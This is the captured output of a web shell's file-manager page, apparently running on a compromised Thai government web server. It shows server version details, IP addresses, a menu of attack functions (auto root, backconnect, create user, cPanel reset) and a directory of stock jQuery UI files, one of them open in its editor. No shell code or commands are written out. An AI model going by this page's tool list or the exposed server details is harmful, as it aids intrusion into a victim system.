Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss_test /
images /
jquery /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
i18n
[ DIR ]
drwxr-xr-x
minified
[ DIR ]
drwxr-xr-x
jquery-ui-1.8.13.custom.js
362.09
KB
-rw-r--r--
jquery.effects.blind.js
1.35
KB
-rw-r--r--
jquery.effects.bounce.js
2.99
KB
-rw-r--r--
jquery.effects.clip.js
1.64
KB
-rw-r--r--
jquery.effects.core.js
22.37
KB
-rw-r--r--
jquery.effects.drop.js
1.62
KB
-rw-r--r--
jquery.effects.explode.js
2.32
KB
-rw-r--r--
jquery.effects.fade.js
691
B
-rw-r--r--
jquery.effects.fold.js
1.86
KB
-rw-r--r--
jquery.effects.highlight.js
1.17
KB
-rw-r--r--
jquery.effects.pulsate.js
1.19
KB
-rw-r--r--
jquery.effects.scale.js
6.78
KB
-rw-r--r--
jquery.effects.shake.js
1.89
KB
-rw-r--r--
jquery.effects.slide.js
1.62
KB
-rw-r--r--
jquery.effects.transfer.js
1.1
KB
-rw-r--r--
jquery.ui.accordion.js
15.88
KB
-rw-r--r--
jquery.ui.autocomplete.js
16.14
KB
-rw-r--r--
jquery.ui.button.js
10.14
KB
-rw-r--r--
jquery.ui.core.js
8.02
KB
-rw-r--r--
jquery.ui.datepicker.js
73.38
KB
-rw-r--r--
jquery.ui.dialog.js
21.3
KB
-rw-r--r--
jquery.ui.draggable.js
29.71
KB
-rw-r--r--
jquery.ui.droppable.js
9.24
KB
-rw-r--r--
jquery.ui.mouse.js
4.1
KB
-rw-r--r--
jquery.ui.position.js
7.17
KB
-rw-r--r--
jquery.ui.progressbar.js
2.32
KB
-rw-r--r--
jquery.ui.resizable.js
25.78
KB
-rw-r--r--
jquery.ui.selectable.js
6.68
KB
-rw-r--r--
jquery.ui.slider.js
17.18
KB
-rw-r--r--
jquery.ui.sortable.js
39.01
KB
-rw-r--r--
jquery.ui.tabs.js
20.75
KB
-rw-r--r--
jquery.ui.widget.js
6.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.ui.progressbar.js
/* * jQuery UI Progressbar 1.8.13 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Progressbar * * Depends: * jquery.ui.core.js * jquery.ui.widget.js */ (function( $, undefined ) { $.widget( "ui.progressbar", { options: { value: 0, max: 100 }, min: 0, _create: function() { this.element .addClass( "ui-progressbar ui-widget ui-widget-content ui-corner-all" ) .attr({ role: "progressbar", "aria-valuemin": this.min, "aria-valuemax": this.options.max, "aria-valuenow": this._value() }); this.valueDiv = $( "<div class='ui-progressbar-value ui-widget-header ui-corner-left'></div>" ) .appendTo( this.element ); this.oldValue = this._value(); this._refreshValue(); }, destroy: function() { this.element .removeClass( "ui-progressbar ui-widget ui-widget-content ui-corner-all" ) .removeAttr( "role" ) .removeAttr( "aria-valuemin" ) .removeAttr( "aria-valuemax" ) .removeAttr( "aria-valuenow" ); this.valueDiv.remove(); $.Widget.prototype.destroy.apply( this, arguments ); }, value: function( newValue ) { if ( newValue === undefined ) { return this._value(); } this._setOption( "value", newValue ); return this; }, _setOption: function( key, value ) { if ( key === "value" ) { this.options.value = value; this._refreshValue(); if ( this._value() === this.options.max ) { this._trigger( "complete" ); } } $.Widget.prototype._setOption.apply( this, arguments ); }, _value: function() { var val = this.options.value; // normalize invalid value if ( typeof val !== "number" ) { val = 0; } return Math.min( this.options.max, Math.max( this.min, val ) ); }, _percentage: function() { return 100 * this._value() / this.options.max; }, _refreshValue: function() { var value = this.value(); var percentage = this._percentage(); if ( this.oldValue !== value ) { this.oldValue = value; this._trigger( "change" ); } this.valueDiv .toggle( value > this.min ) .toggleClass( "ui-corner-right", value === this.options.max ) .width( percentage.toFixed(0) + "%" ); this.element.attr( "aria-valuenow", value ); } }); $.extend( $.ui.progressbar, { version: "1.8.13" }); })( jQuery );
Close